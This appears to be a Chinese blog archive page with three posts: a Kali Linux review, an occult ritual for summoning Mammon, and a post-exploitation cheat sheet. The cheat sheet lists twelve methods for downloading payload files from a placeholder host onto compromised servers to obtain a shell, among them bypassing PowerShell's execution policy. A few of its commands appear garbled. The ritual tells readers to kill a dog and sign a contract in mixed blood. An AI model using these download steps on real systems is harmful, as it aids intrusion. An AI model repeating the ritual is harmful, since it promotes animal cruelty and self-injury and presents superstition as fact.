2023 年 2 月

  • Kali linux 系统评测

    Kali Linux 系统评测

     系统:debian Linux  系统支持: 64位 32位 

    稳定性:最佳 性质:免费使用

    适用业务: 信息取证 — WIFI与嗅探 —逆向工程 —社交工程

    ——-缺点与不足

    防御级别低 — 硬件兼并性差 

    ——-优点: 

    预装300+渗透测试工具[框架]节省环境配置

    开源量无Git树和集成注入补丁

    支持大设备以及拥有多语言 

    完全可定制开发环境的安全

    环境兼并性高完全命令行操作

    总结:

    适合于高级渗透使用系统的开发范围和服务群体较广,个人认定为最完美的系统,系统使用前期难,吃力但熟练使用后无法离开,新手入手前建议多了解debian系统否则可能走较多弯路,用熟练后再实战。

    官网  下载镜像

  • 与撒旦达成交易

    前言

    玛门-属于贪婪、金钱、权力的特征并可交易此些条件

    仪式

    1. 7.9.11 月是祂最高涨时期并且在其中三个月的14-18日中挑选月亮出现、需要配备(蟾蜍、盐、白或红魔法蜡烛、腐乳动物、红皮书)必要情况可能需要性方面条件出现。(画六芒星中心建议中心为1米防止意外)(盐需要撒在六芒星外环)(事先准备好契约)心里念诵(Tasa Mammon On Ca Lirach)直到你能感觉到身体被压力冲击时,将犬类动物杀死将血液与自身的血液混合在契约用血液签字_并将祭品-契约-蟾蜍放入圈外,蟾蜍放置契约上方,只要是动物停止流血时便闭上眼睛用自己的意识去寻找祂并且对话,那种感觉似虚无,但是你能确切他存在,告诉祂你为何召唤告诉祂的具体,你能给祂什么,这种感官上的存在一定会让你明白到祂的存在,如果交易完成,蟾蜍会被祂拿走反之交易失败,另外动物停止流血后如果突然流血你也能感觉到祂失望并且离开了你。

    附加

    1.长期食用肉食群体极大程度失效

    2.盐必须封死碘盐和工业盐都行

    3.配备礼貌和卑谦另外带着尊重

    4.切记不要走出六芒星外

    5.记得冷静不要惧怕与不安

    忘记补充

    蜡烛需要点在六个角 时间建议在当日的凌晨1-3点钟之间。

  • 后渗透文件下载方法

    在渗透中难免会遇到没上传点,只有编辑器和设置.后端权限等情况,而拿shell是渗透中必不可少的操作.这篇文章我总结了12个下载文件的方式,方便读者们将文件上传到目标服务器中拿到所需。

    0x01 Powershell

    创建如下PSH脚本:

    $p = New-Object System.Net.WebClient 
$p.DownloadFile("http://domain/file","C:%homepath%file")

    执行:

    PS C:> .test.ps1

    如果Powershell禁止执行了,使用如下命令:

    C:>powershell set-executionpolicy unrestricted

    0x02 Visual Basic

    VBS脚本内容

    Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
  .type = 1 '
  .open
  .write xHttp.responseBody
  .savetofile " C:\%homepath%\file", 2 '
end with

    执行:

    C:>cscript test.vbs

    0x03 Perl

    脚本内容

    #!/usr/bin/perl 
use LWP::Simple; 
getstore("http://domain/file", "file");

    执行

    root@kali:~# perl test.pl

    0x04 Python

    脚本内容:

    #!/usr/bin/python 
import urllib2 
u = urllib2.urlopen('http://domain/file') 
localFile = open('local_file', 'w') 
localFile.write(u.read()) 
localFile.close()

    执行:

    root@kali:~# python test.py

    0x05 Ruby

    脚本内容

    #!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}

    执行:

    root@kali:~# ruby test.rb

    0x06 PHP

    脚本内容

    #!/usr/bin/php 
<?php $data = @file("http://example.com/file");
$lf = "local_file";     
$fh = fopen($lf, 'w');     
fwrite($fh, $data[0]);     
fclose($fh); 
?>

    执行

    root@kali:~# php test.php

    0x07 FTP

    执行命令

    ftp 127.0.0.1 username password get file exit

    0x08 TFTP

    执行命令

    tftp -i host GET C:%homepath%file location_of_file_on_tftp_server

    0x09 Bitsadmin

    执行命令

    bitsadmin /transfer n http://domain/file c:%homepath%file

    0x10 Wget

    执行命令

    wget http://example.com/file

    0x11 Netcat

    执行命令

    at file | nc -l 1234

    0x12 Window 文件共享

    执行命令

    nc host_ip 1234 > file